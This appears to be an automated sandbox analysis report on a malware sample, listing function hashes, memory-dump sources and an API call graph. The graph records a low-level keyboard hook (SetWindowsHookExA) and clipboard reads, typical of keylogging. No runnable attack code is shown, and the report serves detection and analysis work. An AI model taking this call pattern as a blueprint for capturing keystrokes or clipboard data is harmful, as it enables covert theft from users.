                                        • Opcode Fuzzy Hash: 2aaa69a551705786bd691014dd475aa8d75fe694a9a59837c7780ad80ed32866
                                        • Instruction Fuzzy Hash: 10E0D83270062467D7185BAB9C017677FDEEBC9B20F14C57DE409D3340CD20AC0286E5
                                        Function 07F7E4F0 Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 52ae431173001fb6411df2b988fa499d0cc58e0eb229d0dc10863860c17bf64c
                                        • Instruction ID: d65896fb77b097f90bde49d6d6137896b6edc471c53ab031a8fd92e21bbd0a57
                                        • Opcode Fuzzy Hash: 52ae431173001fb6411df2b988fa499d0cc58e0eb229d0dc10863860c17bf64c
                                        • Instruction Fuzzy Hash: DEF055B0A18208CBE701ABACD8003AD7BBDAB86300F088433900156268DB308909CB02
                                        Function 07F74182 Relevance: .0, Instructions: 26COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e37fe920588145ea734e0c8bc61f66d346ce0b88d0a164087eaa053beb3c05f0
                                        • Instruction ID: c0748b58f35b47318328bb55e45afd585e1f3f294791133851baf98f901c9c24
                                        • Opcode Fuzzy Hash: e37fe920588145ea734e0c8bc61f66d346ce0b88d0a164087eaa053beb3c05f0
                                        • Instruction Fuzzy Hash: 22E048367506149FC384EBB8D959B463FE5DB8DF51710C1A4F905C7354DE24EC028BA5
                                        Function 07F714C0 Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 38b7475e372aabba40b0f7d334fa310f45a9720ef56f204cb32701ee77298ed2
                                        • Instruction ID: 61d99e9a452af7fc0817b9b3847b59ed1a79cc2826754ab1c2dc54df9494b4bc
                                        • Opcode Fuzzy Hash: 38b7475e372aabba40b0f7d334fa310f45a9720ef56f204cb32701ee77298ed2
                                        • Instruction Fuzzy Hash: 19E0863170052457D6185BAB9800A6BBADEEFC9B20714C06EE51D93344CE70AC0186E5
                                        Function 07F7BE28 Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 24261ac9b5efb120673c4673aa6296256099fdbf7dcc36b5b62c6ce92fb0afec
                                        • Instruction ID: 50e4472802115478d95e5b2d03958829d06c727e39d30e7db541f398b0b63679
                                        • Opcode Fuzzy Hash: 24261ac9b5efb120673c4673aa6296256099fdbf7dcc36b5b62c6ce92fb0afec
                                        • Instruction Fuzzy Hash: 43F0C9B4D15308EFCB14DFA8D4459ADBFB5FB49301F5081AAE80493310D7359A50DF81
                                        Function 07F7F9B0 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07df84ec2d50e581bddf3a3ae3dc8aa4100a31114c987b4c80364acf58dc6b01
                                        • Instruction ID: f7278396454fff25c63e8687f61d99eca2f2e3a80314a0ae5ce9a9437408a1e5
                                        • Opcode Fuzzy Hash: 07df84ec2d50e581bddf3a3ae3dc8aa4100a31114c987b4c80364acf58dc6b01
                                        • Instruction Fuzzy Hash: C5F01574D0020CAFCB45EFA8D40568DBBB5EB48301F50C0AAE804A3350E6355A51DF91
                                        Function 07F74190 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: da604f8a124128acf165a1bd9f9b0a1d1a54abd959c28ed97e06b75e58a3e847
                                        • Instruction ID: c6193eceef67ae9e927cd4e94b9d52cd9f567a390357deac469dc4397eb4b7e6
                                        • Opcode Fuzzy Hash: da604f8a124128acf165a1bd9f9b0a1d1a54abd959c28ed97e06b75e58a3e847
                                        • Instruction Fuzzy Hash: 5AE086317505148F8344EFACE5589463BE9EB8CA6031080A4FD0AC7314DE34EC018B95
                                        Function 07F750CE Relevance: .0, Instructions: 18COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c2832050324644d426b608956d026bd6dae2d1a761d0230b96d5749e92bb287
                                        • Instruction ID: 48a4aa559ec2f8ce0464d88772f1f339233caa0997326b980a2cf9020536bf8c
                                        • Opcode Fuzzy Hash: 2c2832050324644d426b608956d026bd6dae2d1a761d0230b96d5749e92bb287
                                        • Instruction Fuzzy Hash: 9CD05EB2E180099FCB009AA4E8444ECBB70E78B222F044423D112E7110E3305434CB88
                                        Function 07F73AC8 Relevance: .0, Instructions: 18COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a2ab0bf321b5443b733234e3028aa7209ad8be8bb391fb25b0f746767d71c756
                                        • Instruction ID: 6f5ed1c2021c30f48de8f5458e09f187ac9451a8fbf0d36db85ce2a8db0df8c7
                                        • Opcode Fuzzy Hash: a2ab0bf321b5443b733234e3028aa7209ad8be8bb391fb25b0f746767d71c756
                                        • Instruction Fuzzy Hash: 1BD012B78542B19BE601AB2CD9B1DC57B94FE92314B0C4453D04089532D555C458D78D
                                        Function 07F7B2E8 Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ec1adc6c436add3ce260f112ce8f2c4f50ec743ed002266a6011cf273cb2cc95
                                        • Instruction ID: 38ff844755db197c52ba06c197244f765ed5b3342559cc84c0653297d5e054bc
                                        • Opcode Fuzzy Hash: ec1adc6c436add3ce260f112ce8f2c4f50ec743ed002266a6011cf273cb2cc95
                                        • Instruction Fuzzy Hash: F7E017B0D2520CEFCB80EFB8D44A69DBFF5AB04312F5041A9E808A3350EB315A90DB51
                                        Function 07F7BB00 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9585789c276e23be49b17a27cb1270900476a250d3ad3e1f0333b55648b8ad67
                                        • Instruction ID: ed954e9da57a1114de249038270a08b857415560c0f7360601ccf214009311c8
                                        • Opcode Fuzzy Hash: 9585789c276e23be49b17a27cb1270900476a250d3ad3e1f0333b55648b8ad67
                                        • Instruction Fuzzy Hash: 26D017B091520CDBCB04DFB8E44659DBF75EB42306F9041A9E80423250CB315A90DB85
                                        Function 07F7A968 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3a96fb491adee43d06ce7e62415b1b9684212b8955ac08681b5dfd9187cc9af1
                                        • Instruction ID: ccdcaa318dd352ccd35f41a6dff61eec3d7a967794b022b900159cf82a54e5f2
                                        • Opcode Fuzzy Hash: 3a96fb491adee43d06ce7e62415b1b9684212b8955ac08681b5dfd9187cc9af1
                                        • Instruction Fuzzy Hash: CAD05EA689C3C81EC7224264BE570293FB02627321B68169AD838C61E2D04DC55A4293
                                        Function 07F70B8A Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 90844ed5553653fa64c9dfa544adb8da18051ed91e2133cb8b4cab3d1c8f6db0
                                        • Instruction ID: b75940e791349e7b105ff5efae3d1cbff90695a5f053471d93be3406e7ef7a78
                                        • Opcode Fuzzy Hash: 90844ed5553653fa64c9dfa544adb8da18051ed91e2133cb8b4cab3d1c8f6db0
                                        • Instruction Fuzzy Hash: 61D0177286021D8FCF46DBA8CA8246EBB36BF85200B548906A0017B614CA71EA129F45
                                        Function 07F7A978 Relevance: .0, Instructions: 10COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f487b6e189c69dbb2cda0333dec63431348c4dae4d5a765bd1191b6c606cbbdd
                                        • Instruction ID: 1663b4c6cdce1402199ea387e5c30e069b6fbed0c337ccbe9f1fc22475f08aee
                                        • Opcode Fuzzy Hash: f487b6e189c69dbb2cda0333dec63431348c4dae4d5a765bd1191b6c606cbbdd
                                        • Instruction Fuzzy Hash: ECC08CB00246088FC22127A8F80E328BFA86700307F844010F40D020648F649024CF22
                                        Function 07F768D0 Relevance: .0, Instructions: 10COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 98b4a349aac06a57dac451c940fbe2894729e197337b522ec02d8c3d83523995
                                        • Instruction ID: 242a48c92d101fa0d6d182f72e74cc402d6c25c2dd6e49a73488aa0c7f3733c2
                                        • Opcode Fuzzy Hash: 98b4a349aac06a57dac451c940fbe2894729e197337b522ec02d8c3d83523995
                                        • Instruction Fuzzy Hash: 48C04C7E111042DBF6562B54DC06F01BEA5FF91718F08C1A59091A7161C961C035AB15
                                        Function 07F75470 Relevance: .0, Instructions: 9COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab40f816a28ff2b42fab51a19b9f564b884a8243ac7a9f150d9ed4052676f404
                                        • Instruction ID: 0aec811e7de99051d11ccacd4d64bf1629011ac35106675a6b884fb180969cf9
                                        • Opcode Fuzzy Hash: ab40f816a28ff2b42fab51a19b9f564b884a8243ac7a9f150d9ed4052676f404
                                        • Instruction Fuzzy Hash: CAD0EAB5D18209CFCB00CF94D5596FDBBB5AB4A305F648016E41AA7240CB75AA52CF40
                                        Function 07F78169 Relevance: .0, Instructions: 9COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c4f09050874b4bfda0e4ab5547b139d7a1d8943d532fdee320664f82426aa675
                                        • Instruction ID: 2f4472c072010e99ade7789363c90517654983d0218cc387452a482351e37694
                                        • Opcode Fuzzy Hash: c4f09050874b4bfda0e4ab5547b139d7a1d8943d532fdee320664f82426aa675
                                        • Instruction Fuzzy Hash: 9EC09BE6068380E5C20127708C555097D51D67675075D84D7665545151C8714555D637
                                        Function 07F7728C Relevance: .0, Instructions: 8COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 67568b2a6e28938e39a08f4ed83e8c9f133be70f408ea031ca22e25570fd172c
                                        • Instruction ID: 351c4d2595ae2d3549441f38e70fa40607014efb151c9986fc0edc022843a6e0
                                        • Opcode Fuzzy Hash: 67568b2a6e28938e39a08f4ed83e8c9f133be70f408ea031ca22e25570fd172c
                                        • Instruction Fuzzy Hash: B8B092A61A8240A18005236849C492AA850EBA6750B8488AA77154045084708428D62B
                                        Function 07F70DA9 Relevance: .0, Instructions: 7COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d3abad50454eedb60c8610d737c69893862b97a4504f476e357a847d940a894
                                        • Instruction ID: 78464d7c7e52ec0fc3967d79c2e60d4e553aeab6ddf35653d732cf4b6131d358
                                        • Opcode Fuzzy Hash: 3d3abad50454eedb60c8610d737c69893862b97a4504f476e357a847d940a894
                                        • Instruction Fuzzy Hash: 5DC04C75655205DFCB15CB90D15446A7BB3FF492167604559E40656650CB31FD02CF11
                                        Function 07F72C34 Relevance: .0, Instructions: 7COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 926c7f2532afe1aa47a1310325b655339401be70eb8e1456b64248c42564e625
                                        • Instruction ID: b4d8976d4c005d6fc80b8f592f53b2c6d044edceed29140ff83f25be0538e191
                                        • Opcode Fuzzy Hash: 926c7f2532afe1aa47a1310325b655339401be70eb8e1456b64248c42564e625
                                        • Instruction Fuzzy Hash: 9DC09B71F305248AC348DB74FA84C5D67A5FE857407404D354C05560B6C754ED19E585
                                        Function 07F74AD1 Relevance: .0, Instructions: 7COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6803030faa50426c8f0a8fe11dd9bd7c4a7fae7923df52b87dd39f3346877d66
                                        • Instruction ID: 5f7a1354cff42234488527f7fef6d2b9b2b602f61aeeb01c1ee9e94396dc6187
                                        • Opcode Fuzzy Hash: 6803030faa50426c8f0a8fe11dd9bd7c4a7fae7923df52b87dd39f3346877d66
                                        • Instruction Fuzzy Hash: 60A0024B84555216D5402659D5D13450970A761646FD454D4D01595251F934C2052662

                                        Execution Graph

                                        Execution Coverage:9.8%
                                        Dynamic/Decrypted Code Coverage:93%
                                        Signature Coverage:1.5%
                                        Total number of Nodes:201
                                        Total number of Limit Nodes:25
                                        execution_graph 23655 2a80848 23657 2a8084e 23655->23657 23656 2a8091b 23657->23656 23659 2a81380 23657->23659 23661 2a81396 23659->23661 23660 2a81490 23660->23657 23661->23660 23666 613fbc0 23661->23666 23672 613fbbf 23661->23672 23678 61358e3 23661->23678 23684 61358f8 23661->23684 23667 613fbc8 23666->23667 23668 613fc0d 23667->23668 23690 613fca2 23667->23690 23694 613fc20 23667->23694 23698 613fc10 23667->23698 23668->23661 23673 613fbc8 23672->23673 23674 613fc0d 23673->23674 23675 613fca2 SetWindowsHookExA 23673->23675 23676 613fc10 SetWindowsHookExA 23673->23676 23677 613fc20 SetWindowsHookExA 23673->23677 23674->23661 23675->23673 23676->23673 23677->23673 23679 613590a 23678->23679 23682 61359bb 23679->23682 23706 613039c 23679->23706 23681 6135981 23711 61303bc 23681->23711 23682->23661 23685 613590a 23684->23685 23686 613039c GetModuleHandleW 23685->23686 23688 61359bb 23685->23688 23687 6135981 23686->23687 23689 61303bc KiUserCallbackDispatcher 23687->23689 23688->23661 23689->23688 23692 613fc5d 23690->23692 23691 613fca0 23691->23667 23692->23691 23702 613ee20 23692->23702 23696 613fc3d 23694->23696 23695 613fca0 23695->23667 23696->23695 23697 613ee20 SetWindowsHookExA 23696->23697 23697->23696 23700 613fc20 23698->23700 23699 613fca0 23699->23667 23700->23699 23701 613ee20 SetWindowsHookExA 23700->23701 23701->23700 23704 613fe28 SetWindowsHookExA 23702->23704 23705 613feb2 23704->23705 23705->23692 23707 61303a7 23706->23707 23715 6136eb1 23707->23715 23725 6136ec0 23707->23725 23708 6135f6a 23708->23681 23712 61303c7 23711->23712 23714 613d8b3 23712->23714 23771 613c304 23712->23771 23714->23682 23716 6136ec0 23715->23716 23735 6135e44 23716->23735 23719 6136f6e 23721 6136f9a 23719->23721 23751 6135e54 23719->23751 23724 6135e44 GetModuleHandleW 23724->23719 23726 6136ec5 23725->23726 23727 6135e44 GetModuleHandleW 23726->23727 23728 6136f52 23727->23728 23730 6136f6e 23728->23730 23732 6137391 GetModuleHandleW 23728->23732 23733 6137410 GetModuleHandleW 23728->23733 23734 6135e44 GetModuleHandleW 23728->23734 23729 6136f9a 23729->23729 23730->23729 23731 6135e54 GetModuleHandleW 23730->23731 23731->23729 23732->23730 23733->23730 23734->23730 23737 6135e4f 23735->23737 23736 6136f52 23736->23719 23736->23724 23740 6137410 23736->23740 23746 6137391 23736->23746 23737->23736 23755 613760f 23737->23755 23763 613769e 23737->23763 23741 6137420 23740->23741 23742 6137425 23740->23742 23741->23719 23743 61374e9 23742->23743 23744 613760f GetModuleHandleW 23742->23744 23745 613769e GetModuleHandleW 23742->23745 23743->23719 23744->23743 23745->23743 23747 61373a0 23746->23747 23748 61373ab 23747->23748 23749 613760f GetModuleHandleW 23747->23749 23750 613769e GetModuleHandleW 23747->23750 23748->23719 23749->23748 23750->23748 23752 61378f0 GetModuleHandleW 23751->23752 23754 6137965 23752->23754 23754->23721 23756 613761a 23755->23756 23757 6135e54 GetModuleHandleW 23756->23757 23758 613773a 23757->23758 23759 6135e54 GetModuleHandleW 23758->23759 23762 61377b4 23758->23762 23760 6137788 23759->23760 23761 6135e54 GetModuleHandleW 23760->23761 23760->23762 23761->23762 23762->23736 23764 61376ee 23763->23764 23765 6135e54 GetModuleHandleW 23764->23765 23766 613773a 23765->23766 23767 6135e54 GetModuleHandleW 23766->23767 23770 61377b4 23766->23770 23768 6137788 23767->23768 23769 6135e54 GetModuleHandleW 23768->23769 23768->23770 23769->23770 23770->23736 23772 613d8c8 KiUserCallbackDispatcher 23771->23772 23774 613d936 23772->23774 23774->23712 23888 613e140 23889 613e145 23888->23889 23890 613e15b 23889->23890 23892 613dbb0 23889->23892 23893 613e190 OleInitialize 23892->23893 23894 613e1f4 23893->23894 23894->23890 23895 61378ea 23896 6137932 23895->23896 23897 6137938 GetModuleHandleW 23895->23897 23896->23897 23898 6137965 23897->23898 23775 6138998 23776 613899d CreateWindowExW 23775->23776 23778 6138abc 23776->23778 23779 613c6f8 DuplicateHandle 23780 613c78e 23779->23780 23781 110d01c 23782 110d034 23781->23782 23783 110d08e 23782->23783 23788 6138b42 23782->23788 23792 6136c44 23782->23792 23800 6138b50 23782->23800 23804 613d2d2 23782->23804 23789 6138b76 23788->23789 23790 6136c44 2 API calls 23789->23790 23791 6138b97 23790->23791 23791->23783 23793 6136c4f 23792->23793 23794 613d361 23793->23794 23796 613d351 23793->23796 23825 613c2ac 23794->23825 23813 613d478 23796->23813 23819 613d488 23796->23819 23797 613d35f 23801 6138b76 23800->23801 23802 6136c44 2 API calls 23801->23802 23803 6138b97 23802->23803 23803->23783 23806 613d2da 23804->23806 23805 613d2e0 23805->23783 23806->23805 23807 613d361 23806->23807 23809 613d351 23806->23809 23808 613c2ac 2 API calls 23807->23808 23810 613d35f 23808->23810 23811 613d478 2 API calls 23809->23811 23812 613d488 2 API calls 23809->23812 23811->23810 23812->23810 23815 613d488 23813->23815 23814 613c2ac 2 API calls 23814->23815 23815->23814 23816 613d56e 23815->23816 23832 613d968 23815->23832 23837 613d958 23815->23837 23816->23797 23821 613d496 23819->23821 23820 613c2ac 2 API calls 23820->23821 23821->23820 23822 613d56e 23821->23822 23823 613d958 OleGetClipboard 23821->23823 23824 613d968 OleGetClipboard 23821->23824 23822->23797 23823->23821 23824->23821 23826 613c2b7 23825->23826 23827 613d674 23826->23827 23828 613d5ca 23826->23828 23829 6136c44 OleGetClipboard 23827->23829 23830 613d622 CallWindowProcW 23828->23830 23831 613d5d1 23828->23831 23829->23831 23830->23831 23831->23797 23833 613d987 23832->23833 23834 613da20 23833->23834 23842 613df20 23833->23842 23848 613dedf 23833->23848 23834->23815 23838 613d987 23837->23838 23839 613da20 23838->23839 23840 613df20 OleGetClipboard 23838->23840 23841 613dedf OleGetClipboard 23838->23841 23839->23815 23840->23838 23841->23838 23844 613df28 23842->23844 23843 613df3c 23843->23833 23844->23843 23854 613df58 23844->23854 23865 613df68 23844->23865 23845 613df51 23845->23833 23849 613df28 23848->23849 23850 613df3c 23849->23850 23852 613df58 OleGetClipboard 23849->23852 23853 613df68 OleGetClipboard 23849->23853 23850->23833 23851 613df51 23851->23833 23852->23851 23853->23851 23855 613df7a 23854->23855 23856 613df95 23855->23856 23858 613dfd9 23855->23858 23861 613df58 OleGetClipboard 23856->23861 23862 613df68 OleGetClipboard 23856->23862 23857 613df9b 23857->23845 23860 613e059 23858->23860 23876 613e230 23858->23876 23880 613e220 23858->23880 23859 613e077 23859->23845 23860->23845 23861->23857 23862->23857 23866 613df7a 23865->23866 23867 613df95 23866->23867 23869 613dfd9 23866->23869 23872 613df58 OleGetClipboard 23867->23872 23873 613df68 OleGetClipboard 23867->23873 23868 613df9b 23868->23845 23871 613e059 23869->23871 23874 613e230 OleGetClipboard 23869->23874 23875 613e220 OleGetClipboard 23869->23875 23870 613e077 23870->23845 23871->23845 23872->23868 23873->23868 23874->23870 23875->23870 23878 613e245 23876->23878 23879 613e26b 23878->23879 23884 613dcc8 23878->23884 23879->23859 23882 613e245 23880->23882 23881 613dcc8 OleGetClipboard 23881->23882 23882->23881 23883 613e26b 23882->23883 23883->23859 23885 613e2d8 OleGetClipboard 23884->23885 23887 613e372 23885->23887

                                        Executed Functions

                                        Function 02A8C980 Relevance: 3.5, Strings: 1, Instructions: 2244COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,btq
                                        • API String ID: 0-3970051468
                                        • Opcode ID: 1cd9c345ea112dfe442694d8fdb37efd360ee68f0b286d362938a1c8b7be86e3
                                        • Instruction ID: 84d1314cfd728c90369b37ffa40a967b6fdc4aa5484c23acc696ac9ed666e26e
                                        • Opcode Fuzzy Hash: 1cd9c345ea112dfe442694d8fdb37efd360ee68f0b286d362938a1c8b7be86e3
                                        • Instruction Fuzzy Hash: CE330D31D107198EDB14EF68C8806ADF7B1FF99300F15D69AE449A7221EB70AAD5CF81
                                        Function 02A89638 Relevance: 2.8, Instructions: 2801COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a2c55a9d1d02624ef7d260010a42021285cc6b2e362fee0c48bbc77eb6ed55db
                                        • Instruction ID: cd70e132b39526261c9eaaeb7e7f140ff861c87a5f68a20b151aaa8c85b74ff1
                                        • Opcode Fuzzy Hash: a2c55a9d1d02624ef7d260010a42021285cc6b2e362fee0c48bbc77eb6ed55db
                                        • Instruction Fuzzy Hash: 5053E731D10B1A8ACB51EF68C8806A9F7B1FF99300F51D79AE45877121EF70AAD5CB81
                                        Function 0613EE20 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1432 613ee20-613fe72 1435 613fe74-613fe7c 1432->1435 1436 613fe7e-613feb0 SetWindowsHookExA 1432->1436 1435->1436 1437 613feb2-613feb8 1436->1437 1438 613feb9-613fed9 1436->1438 1437->1438
                                        APIs
                                        • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0613FC90,00000000,00000000), ref: 0613FEA3
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: 6a577b7fe22ba678e21811b86643e8ef3576ea1b327e71d70a80e31567912954
                                        • Instruction ID: b008cdd8667b6257aa23116ff0e25899ff059905dc84ec5ac8afdcd00bab918e
                                        • Opcode Fuzzy Hash: 6a577b7fe22ba678e21811b86643e8ef3576ea1b327e71d70a80e31567912954
                                        • Instruction Fuzzy Hash: FF2135B5D002199FDB54DF9AD844BEEFBF5FB88310F10842AE419A7250C774A945CFA1
                                        Function 02A84AA8 Relevance: .3, Instructions: 266COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 722c520817bdcc95dc41fc066a16bc42c9433f6135b1725fec21e3ab3da2adbb
                                        • Instruction ID: 7ca038b6a441d8d0038cd7ee97ba665ac696d2bb202fda7c8a381ee8f66af1bf
                                        • Opcode Fuzzy Hash: 722c520817bdcc95dc41fc066a16bc42c9433f6135b1725fec21e3ab3da2adbb
                                        • Instruction Fuzzy Hash: A3B14C70E0031A8FDF14EFA9C98579DBBF2BF88318F148529D419A7294EB749845CB91
